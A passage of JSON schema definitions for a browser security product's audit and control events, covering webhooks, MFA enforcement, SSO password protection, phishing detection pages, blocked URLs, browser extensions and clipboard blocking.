to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"Support was requested for domain.com"},"object":{"type":"string","enum":["UNSUPPORTED_APP_SUPPORT_REQUESTED"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Unsupported app support requested"},"actor":{"$ref":"#/components/schemas/AdminAuditLogActor"},"new":{"type":"object","properties":{"domain":{"type":"string","description":"The domain of the app for which support was requested.","example":"domain.com"}},"required":["domain"]}},"required":["version","id","tenantId","timestamp","category","object","actor","new"]},"id":"schema_721"},"schema_722":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"Support request was cancelled for domain.com"},"object":{"type":"string","enum":["UNSUPPORTED_APP_SUPPORT_REQUEST_CANCELLED"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Unsupported app support request cancelled"},"actor":{"$ref":"#/components/schemas/AdminAuditLogActor"},"new":{"type":"object","properties":{"domain":{"type":"string","description":"The domain of the app for which a support request was cancelled.","example":"domain.com"}},"required":["domain"]}},"required":["version","id","tenantId","timestamp","category","object","actor","new"]},"id":"schema_722"},"schema_723":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example.com updated the message to employees"},"object":{"type":"string","enum":["URL_BLOCK_PAGE_UPDATED"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"URL block page updated"},"actor":{"$ref":"#/components/schemas/AdminAuditLogActor"},"new":{"type":"object","properties":{"title":{"type":"string","description":"The title of the block page."},"subtext":{"type":"string","description":"The subtext of the block page."}},"required":["title","subtext"]}},"required":["version","id","tenantId","timestamp","category","object","actor","new"]},"id":"schema_723"},"schema_724":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example.com added custom words to weak password checks"},"object":{"type":"string","enum":["WEAK_PASSWORD_CUSTOM_WORDS_ADDED"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Weak password custom words added"},"actor":{"$ref":"#/components/schemas/AdminAuditLogActor"},"new":{"type":"object","properties":{"customWords":{"type":"array","items":{"type":"string"},"description":"Custom words added to the weak password check.","example":["pushsecurity","password"]}},"required":["customWords"]}},"required":["version","id","tenantId","timestamp","category","object","actor","new"]},"id":"schema_724"},"schema_725":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example.com removed custom words from weak password checks"},"object":{"type":"string","enum":["WEAK_PASSWORD_CUSTOM_WORDS_REMOVED"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Weak password custom words removed"},"actor":{"$ref":"#/components/schemas/AdminAuditLogActor"},"new":{"type":"object","properties":{"customWords":{"type":"array","items":{"type":"string"},"description":"Custom words removed from the weak password check.","example":["pushsecurity","password"]}},"required":["customWords"]}},"required":["version","id","tenantId","timestamp","category","object","actor","new"]},"id":"schema_725"},"schema_726":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example.com added a new webhook"},"object":{"type":"string","enum":["WEBHOOK_ADDED"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Webhook added"},"actor":{"$ref":"#/components/schemas/AdminAuditLogActor"},"new":{"type":"object","properties":{"url":{"type":"string","description":"The configured URL.","nullable":true},"types":{"type":"array","items":{"type":"string"},"description":"Filter webhook events by these types. An empty array represents all types.","example":["API_KEY_ADDED","CONTROL_RULE_UPDATED"]},"categories":{"type":"array","items":{"type":"string"},"description":"Filter webhook events by these categories. An empty array represents all categories.","example":["AUDIT","CONTROL"]},"webhookType":{"type":"string","description":"The type of webhook.","example":"CUSTOM"}},"required":["url","types","categories","webhookType"]}},"required":["version","id","tenantId","timestamp","category","object","actor","new"]},"id":"schema_726"},"schema_727":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example.com removed an existing webhook"},"object":{"type":"string","enum":["WEBHOOK_REMOVED"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Webhook removed"},"actor":{"$ref":"#/components/schemas/AdminAuditLogActor"},"new":{"type":"object","properties":{"url":{"type":"string","description":"The configured URL before removal.","nullable":true},"types":{"type":"array","items":{"type":"string"},"description":"Filter webhook events by these types. An empty array represents all types.","example":["API_KEY_ADDED","CONTROL_RULE_UPDATED"]},"categories":{"type":"array","items":{"type":"string"},"description":"Filter webhook events by these categories. An empty array represents all categories.","example":["AUDIT","CONTROL"]},"webhookType":{"type":"string","description":"The type of webhook.","example":"CUSTOM"}},"required":["url","types","categories","webhookType"]}},"required":["version","id","tenantId","timestamp","category","object","actor","new"]},"id":"schema_727"},"schema_728":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example assigned licenses to employees"},"object":{"type":"string","enum":["APP_BANNER_CONFIGURED"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"License assigned"},"actor":{"oneOf":[{"$ref":"#/components/schemas/AdminAuditLogActor"},{"$ref":"#/components/schemas/AdminAuditLogActorAPI"}]},"new":{"type":"object","properties":{"title":{"type":"string","description":"Title of the app banner.","example":"This is a title"},"subtext":{"type":"string","description":"Subtext of the app banner.","example":"This is the subtext that supports limited [markdown](https://markdown.org)"},"mode":{"$ref":"#/components/schemas/AppBannerModeType"},"buttonText":{"type":"string","description":[{"$$mdtype":"Node","type":"paragraph","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"Button text of the app banner. Only applicable when the app banner is in "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"ACKNOWLEDGE"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":" or "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"REASON"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":" mode, or is in "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"BLOCK"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":" mode with "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"allowReasonSubmission"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":" set to true."},"children":[]}]}]}],"example":"Proceed anyway","nullable":true},"allowReasonSubmission":{"type":"boolean","description":[{"$$mdtype":"Node","type":"paragraph","attributes":{},"children":[{"$$mdtype":"Node","type":"inline","attributes":{},"children":[{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":"Whether the user is allowed to submit a request to access a blocked page. Only applicable when the app banner is in "},"children":[]},{"$$mdtype":"Node","type":"code","inline":true,"attributes":{"content":"BLOCK"},"children":[]},{"$$mdtype":"Node","type":"text","inline":true,"attributes":{"content":" mode."},"children":[]}]}]}],"example":false,"nullable":true}},"required":["title","subtext","mode"]}},"required":["version","id","tenantId","timestamp","category","object","actor","new"]},"id":"schema_728"},"schema_729":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example assigned licenses to employees"},"object":{"type":"string","enum":["APP_BANNER_CONFIGURED"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"License assigned"},"actor":{"oneOf":[{"$ref":"#/components/schemas/AdminAuditLogActor"},{"$ref":"#/components/schemas/AdminAuditLogActorAPI"}]},"new":{"type":"object","properties":{"enabled":{"type":"boolean","description":"Whether the app banner is enabled or disabled.","example":true}},"required":["enabled"]}},"required":["version","id","tenantId","timestamp","category","object","actor","new"]},"id":"schema_729"},"schema_730":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example.com updated MFA enforcement apps"},"object":{"type":"string","enum":["MFA_ENFORCEMENT_APPS_UPDATED"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"MFA enforcement apps updated"},"actor":{"$ref":"#/components/schemas/AdminAuditLogActor","description":"Information about the admin user that updated the page settings."},"new":{"type":"object","properties":{"apps":{"type":"array","items":{"type":"string"},"description":"The apps that MFA enforcement is enabled on.","example":["GITHUB"]}},"required":["apps"]}},"required":["version","id","tenantId","timestamp","category","object","actor","new"]},"id":"schema_730"},"schema_731":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example.com updated MFA enforcement settings"},"object":{"type":"string","enum":["MFA_ENFORCEMENT_SETTINGS_UPDATED"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"MFA enforcement settings updated"},"actor":{"$ref":"#/components/schemas/AdminAuditLogActor","description":"Information about the admin user that updated the page settings."},"new":{"type":"object","properties":{"title":{"type":"string","description":"The title of the MFA banner shown to users."},"subtext":{"type":"string","description":"The subtext of the MFA banner shown to users."},"buttonText":{"type":"string","description":"The button text of the MFA banner shown to users."}},"required":["title","subtext","buttonText"]}},"required":["version","id","tenantId","timestamp","category","object","actor","new"]},"id":"schema_731"},"schema_732":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example.com updated the message to employees"},"object":{"type":"string","enum":["PHISHING_TOOL_DETECTION_PAGE_UPDATED"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Phishing Tool Detection page updated"},"actor":{"$ref":"#/components/schemas/AdminAuditLogActor","description":"Information about the admin user that updated the page settings."},"new":{"type":"object","properties":{"title":{"type":"string","description":"The title of the page shown to users."},"subtext":{"type":"string","description":"The subtext of the page shown to users."},"ignoreButtonText":{"type":"string","description":"The text of the button that allows users to proceed."}},"required":["title","subtext","ignoreButtonText"]}},"required":["version","id","tenantId","timestamp","category","object","actor","new"]},"id":"schema_732"},"schema_733":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example.com set the mode to warn"},"object":{"type":"string","enum":["PHISHING_TOOL_DETECTION_MODE_UPDATED"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Phishing Tool Detection mode updated"},"actor":{"$ref":"#/components/schemas/AdminAuditLogActor","description":"Information about the admin user that updated the mode."},"new":{"type":"object","properties":{"mode":{"type":"string","description":"The current mode for the Phishing Tool Detection feature."}},"required":["mode"]}},"required":["version","id","tenantId","timestamp","category","object","actor","new"]},"id":"schema_733"},"schema_734":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example.com added ignored domains"},"object":{"type":"string","enum":["SSO_PASSWORD_PROTECTION_IGNORED_DOMAINS_ADDED"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"SSO password protection ignored domains added"},"actor":{"$ref":"#/components/schemas/AdminAuditLogActor","description":"Information about the admin user that added the domains."},"new":{"type":"object","properties":{"domains":{"type":"array","items":{"type":"string"},"description":"A list of the added domains."}},"required":["domains"]}},"required":["version","id","tenantId","timestamp","category","object","actor","new"]},"id":"schema_734"},"schema_735":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example.com removed ignored domains"},"object":{"type":"string","enum":["SSO_PASSWORD_PROTECTION_IGNORED_DOMAINS_REMOVED"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"SSO password protection ignored domains removed"},"actor":{"$ref":"#/components/schemas/AdminAuditLogActor","description":"Information about the admin user that removed the domains."},"new":{"type":"object","properties":{"domains":{"type":"array","items":{"type":"string"},"description":"A list of the removed domains."}},"required":["domains"]}},"required":["version","id","tenantId","timestamp","category","object","actor","new"]},"id":"schema_735"},"schema_736":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example.com set ignore work apps to true"},"object":{"type":"string","enum":["SSO_PASSWORD_PROTECTION_IGNORE_WORK_APPS_TOGGLED"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"SSO password protection ignore work apps toggled"},"actor":{"$ref":"#/components/schemas/AdminAuditLogActor","description":"Information about the admin user that toggled the setting."},"new":{"type":"object","properties":{"enabled":{"type":"boolean","description":"Whether the \"Ignore work apps\" setting is enabled or not."}},"required":["enabled"]}},"required":["version","id","tenantId","timestamp","category","object","actor","new"]},"id":"schema_736"},"schema_737":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example.com set the mode to warn"},"object":{"type":"string","enum":["SSO_PASSWORD_PROTECTION_MODE_UPDATED"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"SSO password protection mode updated"},"actor":{"$ref":"#/components/schemas/AdminAuditLogActor","description":"Information about the admin user that updated the mode."},"new":{"type":"object","properties":{"mode":{"type":"string","description":"The current mode for the SSO Password Protection feature."}},"required":["mode"]}},"required":["version","id","tenantId","timestamp","category","object","actor","new"]},"id":"schema_737"},"schema_738":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example.com updated the message to employees"},"object":{"type":"string","enum":["SSO_PASSWORD_PROTECTION_PAGE_UPDATED"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"SSO password protection page updated"},"actor":{"$ref":"#/components/schemas/AdminAuditLogActor","description":"Information about the admin user that updated the page settings."},"new":{"type":"object","properties":{"title":{"type":"string","description":"The title of the page shown to users."},"subtext":{"type":"string","description":"The subtext of the page shown to users."},"ignoreButtonText":{"type":"string","description":"The text of the button that allows users to proceed."}},"required":["title","subtext","ignoreButtonText"]}},"required":["version","id","tenantId","timestamp","category","object","actor","new"]},"id":"schema_738"},"schema_739":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["AUDIT"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"SSO password protection URL masking enabled"},"object":{"type":"string","enum":["SSO_PASSWORD_PROTECTION_URL_MASKING"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"SSO password protection URL masking"},"actor":{"$ref":"#/components/schemas/AdminAuditLogActor","description":"Information about the admin user that toggled the setting."},"new":{"type":"object","properties":{"enabled":{"type":"boolean","description":"Whether the hide URLs setting is enabled or not."}},"required":["enabled"]}},"required":["version","id","tenantId","timestamp","category","object","actor","new"]},"id":"schema_739"},"schema_740":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["CONTROL"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example.com saw a banner on Google Workspace"},"object":{"type":"string","enum":["APP_BANNER"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"App banner"},"new":{"$ref":"#/components/schemas/AppBannerEvent","description":"App banner event details."}}},"id":"schema_740"},"schema_741":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["CONTROL"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example.com attempted to visit https://blocked.com"},"object":{"type":"string","enum":["BLOCKED_URL_VISITED"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Blocked URL visited"},"new":{"$ref":"#/components/schemas/BlockedURLVisitedEvent","description":"Blocked URL visited event details."}}},"id":"schema_741"},"schema_742":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["CONTROL"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"user@example.com attempted to use Example Extension (dljjddkmmcminffjbcmeccgfbjlhmhlm), but was blocked"},"object":{"type":"string","enum":["BROWSER_EXTENSION_BLOCKED","BROWSER_EXTENSION_ENABLED","BROWSER_EXTENSION_UNABLE_TO_ENFORCE_ENABLED_STATE","BROWSER_EXTENSION_UNABLE_TO_ENFORCE_BLOCKED_STATE"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Browser extension blocked"},"new":{"$ref":"#/components/schemas/BrowserExtensionStateEnforcementEvent","description":"Browser extension state enforcement event details."}}},"id":"schema_742"},"schema_743":{"kind":"json-schema","data":{"type":"object","properties":{"version":{"type":"string","description":"The version of the event.","example":"1"},"id":{"type":"string","format":"uuid","description":"The unique identifier for the event. This can be used as an idempotency key.","example":"c478966c-f927-411c-b919-179832d3d50c"},"tenantId":{"type":"string","format":"uuid","description":"The unique identifier of the tenant the event belongs to.","example":"4f9d2e7a-1b3c-4d5e-8f6a-7c8b9d0e1f2a"},"timestamp":{"type":"integer","description":"When the event occurred, formatted as a UNIX timestamp (in seconds).","example":1698604061},"category":{"type":"string","enum":["CONTROL"],"description":"The category of the event."},"description":{"type":"string","description":"The description of the event. Note: this is subject to change and should not be used to match on this object.","example":"employee@example.com attempted to paste content matching JWT into https://example.com/, but was blocked"},"object":{"type":"string","enum":["CLIPBOARD_BLOCKING"],"description":"The object that was created."},"friendlyName":{"type":"string","description":"The friendly name of this object. Note: this is subject to change and should not be used to match on this object.","example":"Clipboard 